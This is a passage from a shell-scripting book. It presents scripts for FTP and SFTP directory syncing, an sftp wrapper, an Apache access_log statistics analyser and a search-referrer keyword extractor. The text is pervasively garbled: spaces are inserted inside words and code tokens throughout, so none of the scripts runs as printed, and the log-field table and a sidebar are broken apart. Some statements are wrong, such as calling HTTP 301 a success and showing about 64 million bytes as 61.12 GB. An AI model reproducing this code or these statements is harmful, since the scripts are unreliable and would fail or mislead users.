The result of running the ap m script is shown in Figure 9-1. Notice in the screen shot that it not only lists all the

accounts, with a delete link for each, but also, in the bottom section, offers options for adding another account,
changing the password of an existing account, deleting an account, or listing all the accounts.

Figure 9-1: A shell-script-based Apache password management system

Hacking the Script


The Apache h tp ass wd program offers a nice command-line interface for appending the new account and encrypted
password information to the account database, but only one of the two commonly distributed versions of h t pa ss w d
supports batch use for scripts (that is, feeding it both an account and password from the command line). It's easy to tell
whether your version does: If htpas swd doesn't complain when you try to use the -b flag, you've got the good, more
recent version. Otherwise, there's a simple Perl script that offers the same functionality and can be downloaded from
h tt p:/ / www .i ntu it ive. com/ wicke d /ex a m ple s / ht pa ss w d- b. h tm l and installed.

#81 Synchronizing Directories with FTP


One of my most common uses for ft p is to ensure that a local copy of a directory is synchronized with a remote copy
on a web server. The fancy name for this is content mirroring. The basic idea is simple: Move into a specific local
directory, specify a remote server and remote directory, and then ensure that anything that's changed in one directory
is copied to the other, as needed.
This book offers two scripts for FTP syncing: ft p s ync u p and f tp sy nc d ow n . The first uploads all files in the
current directory to the remote directory, while the latter does the opposite and is presented next, as Script #82. Unless
you're starting afresh on a new client system and thus need to acquire the latest versions of files from a server, you'll
most likely use ft ps ync up far, far more often than its sibling, because people rarely work directly on files located on
servers.

The Code
# !/ bin / sh
# f tps y ncu p - G iv en a tar get d i rec t o ry o n a n ft p s er v er , m ak e s su r e th a t
#
al l ne w or mo difi ed f iles a re u p loa d e d to t h e re m ot e s ys t em . U se s
#
a t ime st amp f ile inge nious l y c a l led . ti me st a mp t o k e ep t r ac k.
t im est a mp= ". tim es tamp "
t em pfi l e=" /t mp/ ft psyn cup. $$"
c ou nt= 0
t ra p " / bin /r m - f $tem pfil e" 0 1 15

# z ap t e mp fi l e o n ex i t &s i gs

i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $0 use r@ho st { r emo t e dir } " >& 2
e xit 1
fi
u se r=" $ (ec ho $1 | cut -d@ -f1) "
s er ver = "$( ec ho $1 | c ut - d@ -f 2 )"
e ch o " o pen $ ser ve r" > $te mpfil e
e ch o " u ser $ use r" >> $tem pfile
i f [ $ # -g t 1 ] ; the n
e cho "cd $ 2" >> $te mpfi le
fi
i f [ ! -f $t ime st amp ] ; then
# no tim es tam p file , up load a ll f i les
f or f ile na me in *
do
if [ - f "$f il enam e" ] ; th e n
e cho " put \ "$fi lena me\"" >> $ t emp f i le
c oun t= $(( $c ount + 1 ))
fi
d one
e ls e
f or f ile na me in $(f ind . -ne w er $ t ime s t am p -t y pe f -p r in t)
do
ec h o " pu t \ "$ file name \"" > > $t e m pfi l e
co u nt= $( ($c ou nt + 1))
d one
fi
i f [ $ c oun t -eq 0 ] ; the n
e cho "$0 : No fi les requ ire u p loa d i ng t o $ se rv e r" > & 2
e xit 0
fi
e ch o " q uit " >> $t empf ile

e ch o " S ync hr oni zi ng: Foun d $co u nt f i les i n lo ca l f ol d er to u p lo ad . "


i f ! f t p - n < $ te mpfi le ; then
e cho "Do ne . A ll fil es s ynchr o niz e d up w it h $s e rv er "
t ouc h $t im est am p
fi
e xi t 0

How It Works
The ftp s ync up script uses the .t imest a mp file to ascertain which files in the current directory have changed
since the last time ft psy nc up synchronized with the remote system. If . ti m es t am p isn't present, ft ps y nc up
automatically uploads everything in the current directory.
The actual upload of files occurs in the conditional statement at the end of the script, which tests to see whether the
transfer worked:
i f ! f t p - n < $ te mpfi le ; then
Caution Be warned that some versions of Unix include an ft p program that doesn't properly return a nonzero
failure code to the shell when a transfer fails. If you have such an f tp program, the conditional
statement just shown will always return false, and the t ou c h $t i me s ta mp statement will never
execute. If you find that to be the case, remove the conditional block completely, leaving just the
following:
f tp -n < $ te mpf il e
t ou ch $ tim es tam p
Upon completion, the .ti me stam p file is either created or updated, depending on whether it exists.

Running the Script


To run this script, set up a directory on the remote server that you want to have mirror the contents of a local directory
using f tp, and then synchronize the files in the current directory by invoking ft p sy nc u p with the account name,
server name, and remote directory.
It would be quite easy to either drop this shell invocation directly into a cr o n job or to create a sync alias that
remembers the command-line arguments, as shown in the "Running the Script" section of Script #83, Synchronizing
Files with SFTP.

The Results
$ f tps y ncu p tay lo r@in tuit ive.c o m a r c hiv e
S yn chr o niz in g U p: Fou nd 3 3 fil e s i n loc a l s yn c f ol de r .
P as swo r d:
D on e. A ll fi les s ynch roni zed u p wi t h in t u it iv e. c om
The Pas s wor d: prompt is from within the f tp program itself, and on this Linux system, the entire interaction is
quite succinct and graceful. The second time the command is invoked, it properly reports nothing to do:
$ f tps y ncu p tay lo r@in tuit ive.c o m a r c hiv e
f tp syn c up: N o f il es r equi re up l oad i n g t o in tu it i ve .c o m

Hacking the Script


The ftp s ync up script uploads only files, ignoring directories. To rectify this, you could have each subdirectory within
the working directory on the local system detected in the f o r f i le n am e i n loop, add a m kd ir command to the
$ te mpf i le file, and then invoke another call to f t psy n c up with the name of the new remote subdirectory at the
end of the current script. You'd still need to ensure that you aren't irreversibly stepping into subdirectories, but that can
be managed by invoking subsequent calls to f tps y n cup in subshells.
The problem with this solution is that it's really beginning to push the edges of what's logical to include in a shell script.
If you have ncf tp , for example, you'll find that it has built-in support for recursive p u t commands; rewriting these
scripts to utilize that n cf tp capability makes a lot more sense than continuing to struggle with the more primitive ft p
command.
When to rewrite your script in a "real" programming language

Any shell

script that's
grown to
more than
150 lines or
so would
probably be
better written
in a more
sophisticated
language,
whether
Perl, C, C++,
or even
Java. The
longest
script in this
entire book
is only 149
lines long
(Script #53,
Validating
User
cr on t ab
Entries).
Your cutoff
may vary,
and there
are some
situations in
which you
must solve
the problem
within a shell
script, but
they're few
and far
between.
Think
carefully
about
whether you
can solve
the problem
more
efficiently in
a more
sophisticated
development
environment
if you find
your script is
bursting at
the seams
and
hundreds of
lines long.

#82 Synchronizing to a Remote Directory via FTP


This is the partner to Script #81, fty psync u p, and it proves to be quite a bit simpler. It utilizes the ft p m ge t
command to automatically retrieve the contents of all files in the remote directory, copying them one by one to the local
system.

The Code
# !/ bin / sh
# f tps y ncd ow n - G iven a s ource dir e c tor y on a r e mo te FT P s er v er ,
#
do w nlo ad s a ll the fil es th e rei n int o th e cu r re nt di r ec to r y.
t em pfi l e=" /t mp/ ft psyn cdow n.$$"
t ra p " / bin /r m - f $tem pfil e" 0 1 15

# z ap t e mp fi l e o n ex i t

i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $0 use r@ho st { r emo t e dir } " >& 2
e xit 1
fi
u se r=" $ (ec ho $1 | cut -d@ -f1) "
s er ver = "$( ec ho $1 | c ut - d@ -f 2 )"
e ch o " o pen $ ser ve r" > $te mpfil e
e ch o " u ser $ use r" >> $tem pfile
i f [ $ # -g t 1 ] ; the n
e cho "cd $ 2" >> $te mpfi le
fi
c at << EOF > > $ te mpfi le
p ro mpt
m ge t *
q ui t
E OF
e ch o " S ync hr oni zi ng: Down loadi n g f i l es"
i f ! f t p - n < $ te mpfi le ; then
e cho "Do ne . A ll fil es o n $se r ver d own l o ad ed t o $ (p w d) "
fi
e xi t 0

How It Works
This script works almost identically to Script #81, Synchronizing Directories with FTP, and you'll find the helpful "How It
Works" description there will also apply directly to this script. Also, as with Script #81, if you have a version of f tp that
doesn't properly return a nonzero failure code to the shell when a transfer fails, simply remove the conditional block
completely, leaving only
f tp -n < $ te mpf il e

Running the Script


This script is invoked with the account name and server name of the remote system and an optional remote directory
name that's the target from which to copy files. The current working directory on the local system receives whatever is
copied.

The Results
Copying the contents of the remote archive directory to a new server is a breeze:
$ f tps y ncd ow n t ay lor@ intu itive . com a rch i v e
S yn chr o niz in g: Do wnlo adin g fil e s

P as swo r d:
I nt era c tiv e mod e off.
D on e. A ll fi les o n in tuit ive.c o m d o w nlo a d ed t o / ho me / jo e /a rc h iv e

Hacking the Script


Like its partner script, ft psy ncup, ftps y ncd o w n doesn't deal with transferring directories in a graceful manner.
It will stumble and output an error message for each subdirectory encountered in the remote directory.
Solving this problem is tricky because it's difficult to ascertain the directory and file structure on the remote f tp server.
One possible solution would be to have the script execute a di r command on the remote directory, step through the
output results to ascertain which of the remote matches is a file and which is a subdirectory, download all the files to
the current local directory, make any necessary subdirectories within the local directory, and then, one by one, step into
each new local subdirectory and reinvoke ftps y n cdo w n .
As with the suggested solution to a similar directory problem in Script #81, if you have nc ft p you'll find that it has
built-in support for recursive ge t commands. Rewriting this script to utilize that nc f tp capability makes a lot more
sense than continuing to struggle with the more primitive f t p command.
For a brief note on when to rewrite shell scripts in a "real" programming language, see the "Hacking the Script" section
in Script #81.

#83 Synchronizing Files with SFTP


While the f tp program is quite widely available, it's really something you should avoid like the plague. There are two
reasons for this. First, f tp servers are notorious for being buggy and having security holes, and second, and much
more problematic, ftp transfers all data between the server and client in the clear. This means that when you transmit
files to your server, your account name and password are sent along without any encryption, making it relatively trivial
for someone with a packet sniffer to glean this vital information. That's bad. Very bad.
Instead, all modern servers should support the considerably more secure ssh (secure shell) package, a login and file
transfer pair that supports end-to-end encryption. The file transfer element of the encrypted transfer is s f tp , and it's
even more primitive than f tp, but we can still rewrite f tp s y nc u p to work with s f t p, as shown in this script.
Downloading an ssh package

If you don't have ssh on your system, complain to your vendor


and administrative team. There's no excuse. You can also obtain
the package and install it yourself by starting at
h t tp : / /w w w. o p en s s h. c o m/

The Code
#! /b in /s h
# sf tp sy nc - Gi v en a ta r g et d ir e c to r y o n an sf t p s e r ve r , m a k es s ur e th a t
#
al l new or m odi f i ed f il e s a r e u p l oa d e d t o t h e r e mo t e s y s te m . U s e s
#
a ti mes t amp fil e in g e ni o u sl y ca l l ed . ti m es t a mp t o k e ep t ra c k .
ti me st am p=" . tim e sta m p "
te mp fi le ="/ t mp/ s ftp s y nc . $ $"
co un t= 0
tr ap " /b in/ r m - f $t e m pf i l e" 0 1 1 5

# z a p t e mp f i le o n e x it & si g s

if [ $ # -eq 0 ] ; t h e n
ec ho " Usa g e: $ 0 u s e r@ h o st { r e m ot e d ir } " > &2
ex it 1
fi
us er =" $( ech o $1 | c u t - d @ - f 1 )"
se rv er =" $(e c ho $ 1 | c ut - d@ - f2 ) "
if [ $ # -gt 1 ] ; t h e n
ec ho " cd $ 2" > > $ t e mp f i le
fi
if [ ! - f $ t ime s tam p ] ; th e n
# no t ime s tam p fi l e , u p lo a d a l l f i l es
fo r fi len a me i n *
do
if [ -f "$f i len a m e" ] ; t he n
ec ho " put -P \ " $f i l en a m e\ " " > > $t e m pf i le
co unt = $(( $ cou n t + 1 ))
fi
do ne
el se
fo r fi len a me i n $ ( f in d . - n ew e r $ t i me s t am p - t y pe f - p r in t )
do
e ch o " p ut - P \ " $ fi l e na m e \" " >> $ te m p fi l e
c ou nt= $ (($ c oun t + 1 ) )
do ne
fi
if [ $ co unt -eq 0 ] ; t h e n
ec ho " $0: No f ile s re q u ir e up l o ad i n g t o $ s er v e r" > &2
ex it 1
fi
ec ho " qu it" >> $ tem p f il e

ec ho " Sy nch r oni z ing : Fo u n d $ c ou n t f i l es i n l oc a l f o l de r to u pl o a d. "


if ! s ft p - b $t e mpf i l e " $ us e r @$ s e rv e r " ; th e n
ec ho " Don e . A l l f i l es s yn c h ro n i ze d up w it h $ s e rv e r "
to uc h $ti m est a mp
fi
ex it 0

How It Works
Like f t p , s ftp allows a series of commands to be fed to it as a pipe or input redirect, which makes this script rather
simple to write: Almost the entire script focuses on building the sequence of commands necessary to upload changed
files. At the end, the sequence of commands is fed to the sf t p program for execution.
As with Scripts #81 and #82, if you have a version of s f t p that doesn't properly return a nonzero failure code to the
shell when a transfer fails, simply remove the conditional block at the end of the script, leaving only
sf tp - b $te m pfi l e " $ u se r @ $s e r ve r "
to uc h $t ime s tam p
Because sf tp requires the account to be specified as u s er @ h os t , it's actually a bit simpler than the equivalent
ft p script shown in Script #81, f t ps y n cu p . Also notice the -P flag added to the p u t commands; it causes s f t p to
retain the local permission, creation, and modification times for all files transferred.

Running the Script


This script is simple to run: Move into the local source directory, ensure that the target directory exists, and invoke the
script with your username, server name, and remote directory. For simple situations, I have an alias called s s yn c
(source sync) that moves into the directory I need to keep in sync and invokes s ft p s yn c automatically:
al ia s ss ync = sft p syn c ta y l or @ i nt u i ti v e .c o m / w ic k e d/ s c ri p t s
The "Hacking the Script" section shows a more sophisticated wrapper that makes the synchronization script even more
helpful.

The Results
$ sf tp sy nc t ayl o r@i n t ui t i ve . c om / wi c k ed / s cr i pt s
Sy nc hr on izi n g: F oun d 2 f i le s in l oc a l f o l de r t o up l o ad .
Co nn ec ti ng t o i n tui t i ve . c om . . .
ta yl or ta ylo r @in t uit i v e. c o m' s pa s s wo r d :
sf tp > cd /w i cke d /sc r i pt s
sf tp > pu t - P ". / 003 - n or m d at e . sh "
Up lo ad in g . / 003 - nor m d at e . sh t o / u sr / h om e / ta y lo r / us r / lo c a l/ e t c/ h t tp d / ht d oc s /
in tu it iv e/w i cke d /sc r i pt s / 00 3 - no r m da t e .s h
sf tp > pu t - P ". / 004 - n ic e n um b e r. s h "
Up lo ad in g . / 004 - nic e n um b e r. s h t o /u s r /h o m e/ t ay l o r/ u s r/ l o ca l / et c / ht t p d/ h td o c s/
in tu it iv e/w i cke d /sc r i pt s / 00 4 - ni c e nu m b er . s h
sf tp > qu it
Do ne . Al l f i les syn c h ro n i ze d up w it h in t u it i ve . c om

Hacking the Script


The wrapper script that I use to invoke s ft p s yn c is a tremendously useful script, and I have used it throughout the
development of this book to ensure that the copies of the scripts in the web archive (see
ht tp :/ /w ww. i ntu i tiv e . co m / wi c k ed / ) are exactly in sync with those on my own servers, all the while
adroitly sidestepping the insecurities of the f tp protocol.
This wrapper, s syn c , contains all the necessary logic for moving to the right local directory (see the variable
lo ca ls ou rce ) and creating a file archive that has the latest versions of all the files in a so-called tarball (named for
the t a r , tape archive, command that's used to build it). The last line of the script calls s f tp s y nc :
#! /b in /s h
# ss yn c - I f an y thi n g 's c ha n g ed , cr e a te s a t ar b a ll a nd s yn c s a r em o t e
#
d ir ect o ry v ia s f tp u si n g s f t ps y n c.
sf tp ac ct ="t a ylo r @in t u it i v e. c o m"
ta rb al ln ame = "Al l Fil e s .t g z "

lo ca ls ou rce = "$H O ME/ D e sk t o p/ W i ck e d C o o l S c ri p ts / s cr i p ts "


re mo te di r=" / wic k ed/ s c ri p t s"
ti me st am p=" . tim e sta m p "
co un t= 0
sf tp sy nc ="$ H OME / bin / s ft p s yn c "
# Fi rs t off , le t 's s e e i f t h e l o c al d ir e xi s ts a nd h as f il e s
if [ ! - d " $ loc a lso u r ce " ] ; th e n
ec ho " $0: Err o r: d i re c t or y $l o c al s o ur c e d o es n ' t e x is t ? " > & 2
ex it 1
fi
cd " $l oc als o urc e "
# No w le t's cou n t f i l es t o e n su r e s o m et h i ng ' s c h an g e d:
if [ ! - f $ t ime s tam p ] ; th e n
fo r fi len a me i n *
do
if [ -f "$f i len a m e" ] ; t he n
co unt = $(( $ cou n t + 1 ))
fi
do ne
el se
co un t= $(f i nd . -n e w er $ ti m e st a m p - t yp e f - pr i n t | wc - l)
fi
if [ $ co unt -eq 0 ] ; t h e n
ec ho " $(b a sen a me $ 0 ): N o f i le s fo u n d i n $ l oc a l so u r ce t o s y nc w it h re m ot e . "; e xit
0
fi
ec ho " Ma kin g ta r bal l ar c h iv e fi l e f o r u p l oa d "
ta r -c zf $t a rba l lna m e . / *
# Do ne ! Now let ' s s w i tc h to t he s ft p s yn c sc r ip t
ex ec $ sf tps y nc $ sft p a cc t $r e m ot e d ir
With one command, a new archive file is created, if necessary, and all files (including the new archive, of course) are
uploaded to the server as needed:
$ ss yn c
Ma ki ng t arb a ll a rch i v e f i le f or u pl o a d
Sy nc hr on izi n g: F oun d 2 f i le s in l oc a l f o l de r t o up l o ad .
Co nn ec ti ng t o i n tui t i ve . c om . . .
ta yl or @i ntu i tiv e .co m ' s p a ss w o rd :
sf tp > cd sh e llh a cks / s cr i p ts
sf tp > pu t - P ". / All F i le s . tg z "
Up lo ad in g . / All F ile s . tg z to s he l l ha c k s/ s c ri p ts / A ll F i le s . tg z
sf tp > pu t - P ". / ssy n c "
Up lo ad in g . / ssy n c t o sh e l lh a c ks / s cr i p ts / s sy n c
sf tp > qu it
Do ne . Al l f i les syn c h ro n i ze d up w it h in t u it i ve . c om
This script can doubtless be hacked further. One obvious tweak would be to have s s yn c invoked from a c r o n job
every few hours during the work day so that the files on a remote backup server are invisibly synchronized to your
local files without any human intervention.

Chapter 10: Internet Server Administration


Many Linux, Unix, and Mac OS X readers wear several hats in their jobs, webmaster and web server administrator
being just two of them. For others working on larger systems, the job of managing the server and service is completely
separate from the job of designing and managing actual content on the website, FTP server, and so forth.
Chapter 9, "Website Administration," offered tools geared primarily toward webmasters and other content managers.
This chapter, by contrast, shows how to analyze web server log files, mirror websites, monitor FTP usage and network
health, and even add new virtual host accounts to allow additional domains to be served up from an existing web
server.

#84 Exploring the Apache access_log


If you're running Apache or a similar web server that uses the Common Log Format, there's quite a bit of quick
statistical analysis that can be done with a shell script. The standard configuration for a server has an a c ce s s_ l og
and err or_ lo g written for the site; even ISPs make these raw data files available to customers, but if you've got
your own server, you should definitely have and be archiving this valuable information.
Table 10-1 lists the columns in an ac cess _lo g.
Table 10-1: Field values in the acc ess_ log file
Column

Value

IP of host accessing the server

23

Security information for https/SSL connections

Date and time zone offset of the specific request

Method invoked

URL requested

Protocol used

Result code

Number of bytes transferred

10

Referrer

11

Browser identification string

A typical line in an ac ces s_lo g looks like the following:


63 .203 .109 .38 - - [02 /Sep /20 03:0 9 :51 : 0 9 -0 7 00 ] " G ET /c us t er HT T P/ 1. 1 "
30 1 24 8 "h ttp :/ /se arc h.ms n.c om/r e sul t s . asp ? RS = CH E CK E D& FO R M= M SN H &
v= 1&q= %22l itt le +bi g+H orn% 22" "Mo z ill a / 4 .0 ( co m pa t ib l e; M S IE 6. 0 ; Wi n do w s N T 5. 0)"
The result code (field 8) of 301 indicates success. The referrer (field 10) indicates the URL of the page that the surfer
was visiting immediately prior to the page request on this site: You can see that the user was at s ea r ch .m s n. c om
(MSN) and searched for "little big Horn." The results of that search included a link to the / c us t er URL on this
server.
The number of hits to the site can be quickly ascertained by doing a word count on the log file, and the date range of
entries in the file can be ascertained by comparing the first and last lines therein:
$ wc - l ac ces s_ log
109 91 a cce ss _lo g
$ head -1 acc es s_l og ; ta il -1 a c ces s _ l og
64 .12. 96.1 06 - - [ 13/ Sep/ 200 3:18 : 02: 5 4 -06 0 0] .. .
21 6.93 .167 .15 4 - - [1 5/Se p/2 003: 1 6:3 0 : 2 9 - 0 60 0 ] . ..
With these points in mind, here's a script that produces a number of useful statistics, given an Apache-format
ac cess _log log file.

The Script

#! /bin /sh
# weba cces s - A nal yze s an Ap ache - for m a t ac c es s _l o g f il e, ex t ra c ti ng
#
u sefu l a nd in ter esti ng stat i sti c s .
by tes_ in_g b=1 04 857 6
# You migh t n ee d t o a djus t t he f o llo w i n g t w o t o e ns u re t h at th e y po i nt
# to t hese sc ri pts on you r s yste m (o r j ust en s ur e t h ey 'r e i n y o ur P A TH )
sc ript bc=" $HO ME /bi n/s crip tbc "
# f r o m Sc r ip t # 9
ni cenu mber ="$ HO ME/ bin /nic enu mber "
# fro m S c ri p t # 4
# You will al so wa nt to c han ge t h e f o l l owi n g t o m at c h yo u r o wn ho st na m e
# to h elp wee d out in tern all y re f err e d hit s i n t h e r ef er r er an a ly si s .
ho st=" intu iti ve .co m"
if [ $ # -e q 0 ] ; the n
echo "Us age : $(b ase name $0 ) lo g fil e " >&2
exit 1
fi
if [ ! -r "$1 " ] ; th en
echo "Er ror : log fi le $ 1 n ot f o und . " >&2
exit 1
fi
fi rstd ate= "$( he ad -1 "$1" | awk ' {pr i n t $4 } ' | s e d ' s/ \[ / /' ) "
la stda te=" $(t ai l - 1 " $1" | a wk ' { pri n t $4} ' | se d ' s /\ [/ / ') "
ec ho
ec ho
ec ho
ec ho

" Resu lts o f a nal yzin g l og f i le $ 1 "


""
"
St art d ate : $ (ech o $ firs t dat e | s ed ' s/ : / a t / ') "
"
End d ate : $ (ech o $ last d ate | s e d ' s /: / a t / ' )"

hi ts=" $(wc -l < "$ 1" | se d ' s/[^ [ :di g i t :]] / /g ' )"
ec ho "

H its : $ ($ni cen umbe r $h i t s ) ( t ot a l a cc e ss es ) "

pa ges= "$(g rep - ivE '( .txt |.g if|. j pg| . p n g)' "$ 1 " | w c - l | s e d ' s/ [^ [ :d i gi t :] ]/ /g')"
ec ho "

P age vi ews : $ ($ni cen umbe r $p a g e s) ( hi t s m in u s gr a ph i cs ) "

to talb ytes ="$ (a wk '{s um+= $10 } EN D {p r i n t s u m} ' " $ 1" ) "
ec ho - n " Tra ns fer red : $( $ni cenu m ber $ t ota l by t es ) b y te s "
if [ $ tota lby te s - gt $byt es_ in_g b ] ; t hen
echo "($ ($s cr ipt bc $tot alb ytes / $ b y t es_ i n_ g b) GB ) "
el if [ $to tal by tes -g t 10 24 ] ; t hen
echo "($ ($s cr ipt bc $tot alb ytes / 1 0 2 4 ) M B )"
el se
echo ""
fi
# Now let' s s cr ape th e lo g f ile f or s o m e u s ef u l d at a :
ec ho " "
ec ho " The ten m ost po pula r p ages wer e : "
aw k '{ prin t $ 7} ' " $1" | g rep -iv E '( . g i f|. j pg | .p n g) ' | \
sed 's/\ /$/ /g ' | so rt | \
uniq -c | s or t - rn | he ad -10
ec ho " "
ec ho " The ten m ost co mmon re ferr e r U R L s we r e: "
aw k '{ prin t $ 11 }' "$1 " | \
grep -vE "( ^\ "-\ "$| /www .$h ost| / $ho s t ) " | \
sort | u niq - c | so rt - rn | he a d - 1 0
ec ho " "
ex it 0

How It Works
Although this script looks complex, it's not. It's easier to see this if we consider each block as a separate little script. For
example, the first few lines extract the fir stda t e and la s t da te by simply grabbing the fourth field of the first
and last lines of the file. The number of hits is calculated by counting lines in the file (using wc ), and the number of
page views is simply hits minus requests for image files or raw text files (that is, files with . g if , . jp g , .p n g, or
.t xt as their extension). Total bytes transferred is calculated by summing up the value of tenth field in each line and
then invoking n ice nu mbe r to present it attractively.
The most popular pages can be calculated by extracting just the pages requested from the log file; screening out any
image files; sorting, using un i q -c to calculate the number of occurrences of each unique line; and finally sorting
one more time to ensure that the most commonly occurring lines are presented first. In the code, it looks like this:
aw k '{ prin t $ 7} ' " $1" | g rep -iv E '( . g i f|. j pg | .p n g) ' | \
sed 's/\ /$/ /g ' | so rt | \
uniq -c | s or t - rn | he ad -10
Notice that we do normalize things a little bit: The s ed invocation strips out any trailing slashes, to ensure that
/s ubdi r/ and /s ubd ir are counted as the same request.
Similar to the section that retrieves the ten most requested pages, the following section pulls out the referrer
information:
aw k '{ prin t $ 11 }' "$1 " | \
grep -vE "( ^\ "-\ "$| /www .$h ost| / $ho s t ) " | \
sort | u niq - c | so rt - rn | he a d - 1 0
This extracts field 11 from the log file, screening out both entries that were referred from the current host and entries
that are " -" (the value sent when the web browser is blocking referrer data), and then feeds the result to the same
sequence of s or t |u niq -c| sor t -r n|h e ad - 1 0 to get the ten most common referrers.

Running the Script


To run this script, specify the name of an Apache (or other Common Log Format) log file as its only argument.

The Results
The result of running this script on a typical log file is quite informative:
$ weba cces s / we b/l ogs /int uit ive/ a cce s s _ log
Re sult s of an al yzi ng log fil e /w e b/l o g s /in t ui t iv e /a c ce ss _ lo g
Star t da te:
En d da te:
Hi ts:
Pag evie ws:
T rans ferr ed:

1 3/S ep/ 2003 at 18: 0 2:5 4


1 5/S ep/ 2003 at 16: 3 9:2 1
1 1,0 15 (tot al acce s ses )
4 ,21 7 ( hits mi nus g rap h i c s)
6 4,0 91, 780 byt es ( 6 1.1 2 G B)

Th e te n mo st po pul ar page s w ere:


8 62 / blog /in de x.r df
3 27 / robo ts. tx t
2 66 / blog /in de x.x ml
1 83
1 15 / cust er
96 / blog /st yl es- sit e.cs s
93 / blog
68 / cgi- loc al /et ymo logi c.c gi
66 / orig ins
60 / cool web
Th e te n mo st co mmo n r efer rer URL s we r e :
96 " http :// bo okt alk .int uit ive. c om/ "
18 " http :// bo okt alk .int uit ive. c om/ a r c hiv e s/ c at _ ht m l. sh t ml "
13 " http :// se arc h.m sn.c om/ resu l ts. a s p ?FO R M= M SN H &v = 1& q= l it t le + bi g+ h or n "
12 " http :// ww w.g eoc itie s.c om/c a pec a n a ver a l/ 7 42 0 /v o c1 .h t ml "
10 " http :// se arc h.m sn.c om/ spre s ult s . a spx ? q= p la i ns & FO RM = IE 4 "
9 " http :// ww w.e tym olog ic. com/ i nde x . c gi"
8 " http :// ww w.a llw ords .co m/12 w lin k s . php "
7 " http :// ww w.s un. com/ big admi n /do c s / "
7 " http :// ww w.g oog le.c om/ sear c h?h l = e n&i e =U T F- 8 &o e =U TF - 8& q =c o ol +w e b+ p ag e s"
6 " http :// ww w.g oog le.c om/ sear c h?o e = U TF- 8 &q = ht m l+ 4 +e nt i ti e s"

Hacking the Script


One challenge of analyzing Apache log files is that there are situations in which two different URLs actually refer to the
same page. For example, / cus ter/ and /cus te r / ind e x .s ht m l are the same page, so the calculation of the
ten most popular pages really should take that into account. The conversion performed by the se d invocation already
ensures that / cu s te r and /c uste r/ aren't treated separately, but knowing the default filename for a given
directory might be a bit trickier.
The usefulness of the analysis of the ten most popular referrers can be enhanced by trimming referrer URLs to just the
base domain name (e.g., sl ash dot .org ). Script #85, Understanding Search Engine Traffic, explores additional
information available from the referrer field.

#85 Understanding Search Engine Traffic


Script #84, Exploring the Apache access_log, can offer a broad-level overview of some of the search engine queries
that point to your site, but further analysis can reveal not just which search engines are delivering traffic, but what
keywords were entered by users who arrived at your site via search engines. This information can be invaluable for
understanding whether your site has been properly indexed by the search engines and can provide the starting point
for improving the rank and relevancy of your search engine listings.

The Code
# !/ bin / sh
# s ear c hin fo - Ex trac ts a nd an a lyz e s se a r ch e ng i ne t r af f ic i n di ca t ed i n t he
#
r e fer re r f ie ld o f a Commo n Lo g For m a t ac ce s s lo g .
h os t=" i ntu it ive .c om"
# chan g e t o you r do ma in , a s d es i re d
m ax mat c hes =2 0
c ou nt= 0
t em p=" / tmp /$ (ba se name $0) .$$"
t ra p " / bin /r m - f $tem p" 0
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $( base name $0) l ogf i l e" > & 2
e xit 1
fi
i f [ ! -r "$ 1" ] ; th en
e cho "Er ro r: ca n't open file $1 f o r a n a ly si s. " > &2
e xit 1
fi
f or UR L in $ (aw k '{ i f (l ength ( $11 ) > 4 ) { pr in t $ 11 } } ' "$ 1 " | \
g rep -vE " (/w ww .$ho st|/ $host ) " | g rep ' ?' )
do
s ear c hen gi ne= "$ (ech o $U RL | c ut - d / - f 3 | r ev | cu t - d . -f 1 -2 | re v) "
a rgs = "$( ec ho $U RL | cut -d\? -f2 | tr ' &' ' \n ' | \
g r ep -E '( ^q =|^s id=| ^p=|q u ery = | ite m = |a sk =| n am e= | to p ic =) ' | \
s e d - e 's/ +/ /g' -e 's/%2 0 / / g ' -e ' s/ "/ /g ' | c u t - d= - f 2) "
i f [ ! - z "$a rg s" ] ; t hen
ec h o " ${ sea rc heng ine} :
$a r g s" > > $ te mp
e lse
# N o w el l-k no wn m atch , sho w en t i re G E T st ri n g in s te a d. ..
ec h o " ${ sea rc heng ine}
$( e c ho $ U RL | c u t -d \ ? - f2 )" >> $ t em p
fi
c oun t ="$ (( $c ou nt + 1 ) )"
d on e
e ch o " S ear ch en gi ne r efer rer i n fo e x tra c t ed f ro m $ {1 } :"
s or t $ t emp | un iq -c | so rt -r n | h e ad - $ ma xm at c he s | s e d 's / ^/ / g '
e ch o " "
e ch o S c ann ed $c ou nt e ntri es in log f ile o ut o f $ (w c - l < " $1 " ) to t al .
e xi t 0

How It Works
The main fo r loop of this script extracts all entries in the log file that have a valid referrer with a string length greater
than 4, a referrer domain that does not match the $ h o st variable, and a ? in the referrer string (indicating that a user
search was performed):
f or UR L in $ (aw k '{ i f (l ength ( $11 ) > 4 ) { pr in t $ 11 } } ' "$ 1 " | \
g rep -vE " (/w ww .$ho st|/ $host ) " | g rep ' ?' )

The script then goes through various steps in the ensuing lines to identify the domain name of the referrer and the
search value entered by the user:
s ear c hen gi ne= "$ (ech o $U RL | c ut - d / - f 3 | r ev | cu t - d . -f 1 -2 | re v) "
a rgs = "$( ec ho $U RL | cut -d\? -f2 | tr ' &' ' \n ' | \
g r ep -E '( ^q =|^s id=| ^p=|q u ery = | ite m = |a sk =| n am e= | to p ic =) ' | \
s e d - e 's/ +/ /g' -e 's/%2 0 / / g ' -e ' s/ "/ /g ' | c u t - d= - f 2) "
An examination of hundreds of search queries shows that common search sites use a small number of common
variable names. For example, search on Ya ho o. c o m and your search string is p = pa tt e rn . Google and MSN use
q as the search variable name. The gr ep invocation contains p, q, and the other most common search variable
names.
The last line, the invocation of s ed, cleans up the resultant search patterns, replacing + and % 2 0 sequences with
spaces and chopping quotes out, and then the c u t command returns everything that occurs after the first equal (= )
sign in other words, just the search terms.
The conditional immediately following these lines tests to see if the ar g s variable is empty or not. If it is (that is, if the
query format isn't a known format), then it's a search engine we haven't seen, so we output the entire pattern rather
than a cleaned-up pattern-only value.

Running the Script


To run this script, simply specify the name of an Apache or other Common Log Format log file on the command line.
Speed warning!

This is one of the slowest scripts in this book, because it's spawning lots and lots of
subshells to perform various tasks, so don't be surprised if it takes a while to run.

The Results
$ s ear c hin fo /w eb /log s/in tuiti v e/a c c ess _ l og
S ea rch eng in e r ef erre r in fo ex t rac t e d f r o m /w eb / lo gs / in t ui ti v e/ ac c es s_ l og :
19 msn .c om:
litt le bi g ho r n
14 msn .c om:
cust er
11 goo gl e.c om :
c ool w e b p a g es
10 msn .c om:
plai ns
9 msn .c om:
Litt le Bi g Ho r n
9 goo gl e.c om :
h tml 4 ent i t ies
6 msn .c om:
Cust er
